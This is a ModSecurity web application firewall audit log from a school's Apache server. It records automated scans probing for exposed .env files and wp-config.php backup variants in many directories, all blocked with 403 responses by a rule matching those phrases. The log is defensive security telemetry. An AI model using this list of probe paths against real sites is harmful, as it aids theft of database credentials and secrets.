Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d9667364-Z--
--876f4252-A--
[20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ8AAAAEY 103.236.140.4 38500 103.236.140.4 8181
--876f4252-B--
GET /test/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--876f4252-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--876f4252-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151909277645 656 (- - -)
Stopwatch2: 1745151909277645 656; combined=257, p1=216, p2=0, p3=0, p4=0, p5=40, sr=64, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--876f4252-Z--
--10392b58-A--
[20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ8QAAAFU 103.236.140.4 38502 103.236.140.4 8181
--10392b58-B--
GET /src/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--10392b58-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--10392b58-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151909347510 668 (- - -)
Stopwatch2: 1745151909347510 668; combined=253, p1=221, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--10392b58-Z--
--4d46d65f-A--
[20/Apr/2025:19:25:09 +0700] aATnpVu16wJWB6g0mU8NugAAAA8 103.236.140.4 38504 103.236.140.4 8181
--4d46d65f-B--
GET /production/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--4d46d65f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4d46d65f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151909416693 649 (- - -)
Stopwatch2: 1745151909416693 649; combined=249, p1=223, p2=0, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4d46d65f-Z--
--f3cb5f66-A--
[20/Apr/2025:19:25:09 +0700] aATnpVu16wJWB6g0mU8NuwAAAA0 103.236.140.4 38506 103.236.140.4 8181
--f3cb5f66-B--
GET /new/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--f3cb5f66-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f3cb5f66-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151909486363 669 (- - -)
Stopwatch2: 1745151909486363 669; combined=275, p1=247, p2=0, p3=0, p4=0, p5=27, sr=75, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f3cb5f66-Z--
--5e7ffa2e-A--
[20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ8gAAAEM 103.236.140.4 38508 103.236.140.4 8181
--5e7ffa2e-B--
GET /wp-config.php.bak HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--5e7ffa2e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5e7ffa2e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151909556321 721 (- - -)
Stopwatch2: 1745151909556321 721; combined=303, p1=271, p2=0, p3=0, p4=0, p5=32, sr=114, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5e7ffa2e-Z--
--55e71b60-A--
[20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ8wAAAFE 103.236.140.4 38510 103.236.140.4 8181
--55e71b60-B--
GET /wp-config.php~ HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--55e71b60-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--55e71b60-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151909625392 729 (- - -)
Stopwatch2: 1745151909625392 729; combined=277, p1=240, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--55e71b60-Z--
--3a279456-A--
[20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ9AAAAEQ 103.236.140.4 38512 103.236.140.4 8181
--3a279456-B--
GET /wp-config.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--3a279456-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3a279456-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151909694755 642 (- - -)
Stopwatch2: 1745151909694755 642; combined=252, p1=224, p2=0, p3=0, p4=0, p5=28, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3a279456-Z--
--fcd07176-A--
[20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ9QAAAEI 103.236.140.4 38514 103.236.140.4 8181
--fcd07176-B--
GET /wp-config.php.save HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--fcd07176-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fcd07176-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151909763961 643 (- - -)
Stopwatch2: 1745151909763961 643; combined=239, p1=212, p2=0, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fcd07176-Z--
--8c867964-A--
[20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ9gAAAEo 103.236.140.4 38516 103.236.140.4 8181
--8c867964-B--
GET /wp-config.php-backup HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--8c867964-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8c867964-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151909834061 642 (- - -)
Stopwatch2: 1745151909834061 642; combined=261, p1=235, p2=0, p3=0, p4=0, p5=26, sr=85, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8c867964-Z--
--0a32cc26-A--
[20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ9wAAAFM 103.236.140.4 38518 103.236.140.4 8181
--0a32cc26-B--
GET /wp-config.php1 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--0a32cc26-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0a32cc26-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151909904777 718 (- - -)
Stopwatch2: 1745151909904777 718; combined=248, p1=222, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0a32cc26-Z--
--4733b275-A--
[20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ-QAAAEA 103.236.140.4 38524 103.236.140.4 8181
--4733b275-B--
GET /wp-config.php.orig HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--4733b275-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4733b275-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151909975843 661 (- - -)
Stopwatch2: 1745151909975843 661; combined=247, p1=220, p2=0, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4733b275-Z--
--cb17ad2d-A--
[20/Apr/2025:19:25:10 +0700] aATnplTf0pL9EQC7JDUZ-gAAAFg 103.236.140.4 38526 103.236.140.4 8181
--cb17ad2d-B--
GET /wp-config.phpold HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--cb17ad2d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cb17ad2d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151910053718 630 (- - -)
Stopwatch2: 1745151910053718 630; combined=242, p1=215, p2=0, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cb17ad2d-Z--
--7d80ef27-A--
[20/Apr/2025:19:25:10 +0700] aATnplTf0pL9EQC7JDUZ-wAAAFQ 103.236.140.4 38528 103.236.140.4 8181
--7d80ef27-B--
GET /.wp-config.php.swp HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--7d80ef27-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7d80ef27-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151910123424 628 (- - -)
Stopwatch2: 1745151910123424 628; combined=243, p1=216, p2=0, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7d80ef27-Z--
--d468bb40-A--
[20/Apr/2025:19:25:10 +0700] aATnplTf0pL9EQC7JDUZ_AAAAFA 103.236.140.4 38530 103.236.140.4 8181
--d468bb40-B--
GET /wordpress/wp-config.php.bak HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--d468bb40-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d468bb40-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151910192670 648 (- - -)
Stopwatch2: 1745151910192670 648; combined=246, p1=216, p2=0, p3=0, p4=0, p5=30, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d468bb40-Z--
--9a1cc968-A--
[20/Apr/2025:19:25:10 +0700] aATnplTf0pL9EQC7JDUZ_QAAAFI 103.236.140.4 38532 103.236.140.4 8181
--9a1cc968-B--
GET /wp/wp-config.php.bak HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--9a1cc968-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9a1cc968-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151910262673 665 (- - -)
Stopwatch2: 1745151910262673 665; combined=254, p1=222, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9a1cc968-Z--
--ad059132-A--
[20/Apr/2025:19:25:10 +0700] aATnplTf0pL9EQC7JDUZ_gAAAEw 103.236.140.4 38534 103.236.140.4 8181
--ad059132-B--
GET /test/wp-config.php.bak HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--ad059132-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ad059132-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151910332191 806 (- - -)
Stopwatch2: 1745151910332191 806; combined=293, p1=256, p2=0, p3=0, p4=0, p5=37, sr=70, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ad059132-Z--
--a76ceb46-A--
[20/Apr/2025:19:25:10 +0700] aATnplTf0pL9EQC7JDUZ_wAAAE8 103.236.140.4 38536 103.236.140.4 8181
--a76ceb46-B--
GET /blog/wp-config.php.bak HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--a76ceb46-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a76ceb46-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151910402196 714 (- - -)
Stopwatch2: 1745151910402196 714; combined=313, p1=281, p2=0, p3=0, p4=0, p5=32, sr=109, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a76ceb46-Z--
--939f7016-A--
[20/Apr/2025:19:57:07 +0700] aATvI8TCDeBrh52UaHTABAAAAI4 103.236.140.4 45954 103.236.140.4 8181
--939f7016-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 161.35.36.26
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 161.35.36.26
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--939f7016-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--939f7016-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745153827634630 710 (- - -)
Stopwatch2: 1745153827634630 710; combined=298, p1=255, p2=0, p3=0, p4=0, p5=43, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--939f7016-Z--
--15ea0040-A--
[20/Apr/2025:20:21:56 +0700] aAT09Fu16wJWB6g0mU8RiQAAAA8 103.236.140.4 52220 103.236.140.4 8181
--15ea0040-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.81.194
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.81.194
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; YS900) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.136 Iron Safari/537.36
Accept-Charset: utf-8
--15ea0040-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--15ea0040-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745155316875199 757 (- - -)
Stopwatch2: 1745155316875199 757; combined=310, p1=278, p2=0, p3=0, p4=0, p5=31, sr=73, sw=1, l=0, gc=0
